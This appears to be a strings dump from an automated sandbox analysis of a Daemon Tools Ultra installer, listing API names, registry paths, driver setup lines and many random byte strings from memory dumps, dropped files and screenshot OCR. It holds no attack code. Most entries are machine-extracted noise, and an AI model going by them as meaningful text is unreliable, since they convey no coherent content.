Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\DOSDEVICES\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\drivers\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\drivers\dtusb.sys

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

\dtusbbus.inf

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

\I?zh;ilf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\Implemented Categories

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

\InprocServer32

Unicode based on Dropped File (JSSys3.dll.204366558)

\jssyswp.bmp

Unicode based on Dropped File (JSSys3.dll.204366558)

\LocalServer32

Unicode based on Dropped File (JSSys3.dll.204366558)

\Microsoft\Internet Explorer\Quick Launch

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\ProgID

Unicode based on Dropped File (JSSys3.dll.204366558)

\Required Categories

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

\RPC Control\console-0x00000C5C-lpc-handle

Unicode based on Runtime Data (nsE23E.tmp )

\RPC Control\console-0x00000E34-lpc-handle

Unicode based on Runtime Data (nsCDD1.tmp )

\RPC Control\console-0x00000E74-lpc-handle

Unicode based on Runtime Data (nsF6AA.tmp )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

\settings.ini

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

\Shell\Open\Command

Unicode based on Dropped File (JSSys3.dll.204366558)

\Shell\Opennew\Command

Unicode based on Dropped File (JSSys3.dll.204366558)

\Temp

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\ThemeApiPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

\VersionIndependentProgID

Unicode based on Dropped File (JSSys3.dll.204366558)

\y4>^zbZj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\yQUGkwi-9E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\}D]6~ej$~aFO

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]$9-`b3l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]1yt{s:",

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]_4aG=o~f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]_^4lI_q;A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]G'hXa>&/:^a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]ID`;y1B8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]n/Csyl1f1:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]p@d(L<_@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]V;Av'AQm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]z=if$7JU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]Z[QOCth.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

]~G0e9`LA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^!_Pdti9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^<)Au j?]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^=uA}/6DH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^_Opsd

Ansi based on Dropped File (JSSys3.dll.204366558)

^Hhp9/@/g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^Jfo3m2]0Ty

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^Tie4w8tT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^U[[S8[845533/++.+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

^uAGV$N7v

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_(F9fQ18<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_+:Yr

Ansi based on Dropped File (Uninstall.exe.212096218)

_+PT-,nzv)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_,o,b,

Ansi based on Image Processing (screen_4.png)

_0,_______,_______

Ansi based on Image Processing (screen_4.png)

_0T_0y

Ansi based on Image Processing (screen_7.png)

_3.O.O.O_9

Ansi based on Image Processing (screen_4.png)

_7-:7W`yvy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_?m___q____?v____

Ansi based on Image Processing (screen_0.png)

_[\DRBR"."....

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

__'_q,_'i'

Ansi based on Image Processing (screen_0.png)

___,,

Ansi based on Image Processing (screen_0.png)

___,____

Ansi based on Image Processing (screen_4.png)

____0__

Ansi based on Image Processing (screen_4.png)

_____

Ansi based on Image Processing (screen_7.png)

_____.

Ansi based on Image Processing (screen_4.png)

______

Ansi based on Image Processing (screen_7.png)

______0_____

Ansi based on Image Processing (screen_4.png)

______??J????J

Ansi based on Image Processing (screen_7.png)

_________

Ansi based on Image Processing (screen_4.png)

____________________________________________________________________

Ansi based on Image Processing (screen_4.png)

____tnt____t____t_t___t____t

Ansi based on Image Processing (screen_4.png)

__m__?v____

Ansi based on Image Processing (screen_7.png)

__vbaAptOffset

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaAryConstruct2

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaAryDestruct

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaAryLock

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaAryRecCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaAryUnlock

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaBoolErrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaBoolVarNull

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaCastObj

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaChkstk

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaCopyBytes

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaCyI4

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaCyMulI2

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaErase

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaExceptHandler

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaExitProc

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFailedFriend

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFpCy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFPException

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFpI4

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFreeObj

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFreeStr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFreeStrList

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFreeVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaFreeVarList

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaHresultCheck

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaHresultCheckObj

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaI2ErrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaI4Cy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaI4ErrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaI4Str

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaI4Var

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaInStr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaInStrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaLenBstr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaLsetFixstr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaNew

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaNew2

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaObjSet

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaObjSetAddref

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaOnError

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaR8Cy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRecAnsiToUni

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRecAssign

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRecDestruct

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRecDestructAnsi

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRecUniToAnsi

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRedim

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRedimPreserve

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaRefVarAry

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaSetSystemError

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrCat

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrCmp

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrCy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrErrVarCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrFixstr

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrI4

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrMove

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrTextCmp

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrToAnsi

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrToUnicode

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrVarCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrVarMove

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaStrVarVal

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaUbound

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaUI1ErrVar

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaUI1Str

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarAnd

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarCat

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarDup

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVargVarCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVargVarMove

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarIndexLoad

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarIndexLoadRefLock

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarMove

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarTextCmpGt

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarTextCmpLt

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarTextTstEq

Ansi based on Dropped File (JSSys3.dll.204366558)

__vbaVarVargNofree

Ansi based on Dropped File (JSSys3.dll.204366558)

_`_]Ktgt.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_a___

Ansi based on Image Processing (screen_0.png)

_adj_fdiv_m16i

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdiv_m32

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdiv_m32i

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdiv_m64

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdiv_r

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdivr_m16i

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdivr_m32

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdivr_m32i

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fdivr_m64

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fpatan

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fprem

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fprem1

Ansi based on Dropped File (JSSys3.dll.204366558)

_adj_fptan

Ansi based on Dropped File (JSSys3.dll.204366558)

_allmul

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIatan

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIcos

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIexp

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIlog

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIsin

Ansi based on Dropped File (JSSys3.dll.204366558)

_CIsqrt

Ansi based on Dropped File (JSSys3.dll.204366558)

_CItan

Ansi based on Dropped File (JSSys3.dll.204366558)

_h4=\Mou3b

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_IID_OPS

Unicode based on Dropped File (JSSys3.dll.204366558)

_J]e*]ldd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_MeHa

Ansi based on Image Processing (screen_4.png)

_nU;;O<n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_rogram

Ansi based on Image Processing (screen_4.png)

_T06bl

Ansi based on Image Processing (screen_4.png)

_|%-jO+^T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

_}}W3Co9TX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

` &6ks80;&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`!Y`yMN\B3P

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`$.`Z-V;)E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`$z'Ex.vs

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`+StT#H+[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`.data

Ansi based on Dropped File (JSSys3.dll.204366558)

`.img1

Ansi based on Dropped File (imgengine.dll.62529018)

`.rdata

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`.tgs1

Ansi based on Dropped File (Tages.dll.423655889)

`.tgs2

Ansi based on Dropped File (Tages.dll.423655889)

`/5{2.7L})v*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`7d7h7l7p7t7x7|7

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

`?ewvI}{A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

`_J7'PBcyL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`Cr NH|yB

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`D-5XdRK#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`F8g#5<l}h

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`N"eU9Z3e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`tyQ

Ansi based on Dropped File (Uninstall.exe.212096218)

`UUM(~+P5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`Z`Z\]\__

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`Zef-B7@X

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

`{}S8h654

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A"yy(c^~lnX%f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a')YoM'Dv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A-Bxw?ycV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a0k5TSck]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a1a[<d:0'Q8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a2A+n*>{~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A=Z)-|/W\4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A?0s.5HAy'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

A@nwvv2

Ansi based on Dropped File (Uninstall.exe.212096218)

A[%d,%d]

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

a[kqJb+A#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

a^^PP\ssss_s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aAryRecCopy

Ansi based on Dropped File (JSSys3.dll.204366558)

ABCDEFGHIJKLMNOPQRSTUVWXYZ

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.0084A000.00000004.mdmp)

abcdefghijklmnopqrstuvwxyz

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.0084A000.00000004.mdmp)

aBym/OZ54

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AccListViewV6

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ActiveTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

activeTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

activeTitleText

Unicode based on Dropped File (JSSys3.dll.204366558)

AddReg = DTULTRASCSIBUS.NTx86.AddReg

Ansi based on Dropped File (SET4F37.tmp)

AddService = dtultrascsibus, 2, DTULTRASCSIBUS_ServiceInstall

Ansi based on Dropped File (SET4F37.tmp)

AdjustTokenPrivileges

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Advanced

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

advapi32

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ADVAPI32

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ADVAPI32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Advapi32.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

advapi32.dll

Ansi based on Dropped File (JSSys3.dll.204366558)

ae6/s_y"8Ox

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ae^aPXWOT]]]s_s?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aefZ)AkzR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AEvI)T @<9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aE~O o!6~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aF?DL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aF\x@b=K.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AFiles

Ansi based on Dropped File (JSSys3.dll.204366558)

aia)1u6~2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aiKx fRkW=W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AJ@Lbigwx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ak/g}`_kd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

aL%:hG($J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

alFilename

Unicode based on Dropped File (imgengine.dll.62529018)

All Files(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

All files(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

Always Use Tab

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

AlwaysShowExt

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

anW19:eZe

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

anyaYnaH08m

Ansi based on Image Processing (screen_4.png)

aoZFN-[Uk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

API.dll

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

AppData

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Append Completion

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

AppendMenuA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

AppendMenuW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AppID

Unicode based on Runtime Data (DiscSoftBusService.exe )

APPID

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

April

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ApYrY_

Ansi based on Image Processing (screen_4.png)

Aq|E{,AL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ArEtF3|K:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ASizes

Ansi based on Dropped File (JSSys3.dll.204366558)

Asw(Z~FRw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ation

Unicode based on Memory/File Scan (HiRu.exe , 00044045-00000600.00000000.44546.00445000.00000002.mdmp)

AttachThreadInput

Ansi based on Dropped File (JSSys3.dll.204366558)

Attributes

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

August

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

aUI1Str

Ansi based on Dropped File (JSSys3.dll.204366558)

AukTkC:A7-`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

AuthenticodeEnabled

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

AutoCheckSelect

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

AutoDetect

Unicode based on Runtime Data (DiscSoftBusService.exe )

AutoSuggest

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

aV?nKYefEl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b"1U80oy*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B#nH/37^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B$2 "P>gg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b%Ad{~ebI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B.aF;KUsK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B2w\y c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B4{K{jq(\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B<?8eTiPX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b>YC^\zD"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b@begfmmv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b@hPMUe{D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

B[%d,%d]

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

B\Vid_25B1&Pid_0001

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

b]@Fsp`bK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

b`ec`bo``

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Background

Unicode based on Dropped File (JSSys3.dll.204366558)

bad allocation

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

Bad dynamic_cast!

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

bad exception

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

bAIKD<A1a-8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bbus.sys

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

BBZZRR0-))$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bcD$W$SLG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bD%Bb]sZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

BeginPaint

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

BF8`WQ^?i

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bFeYqvpCx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

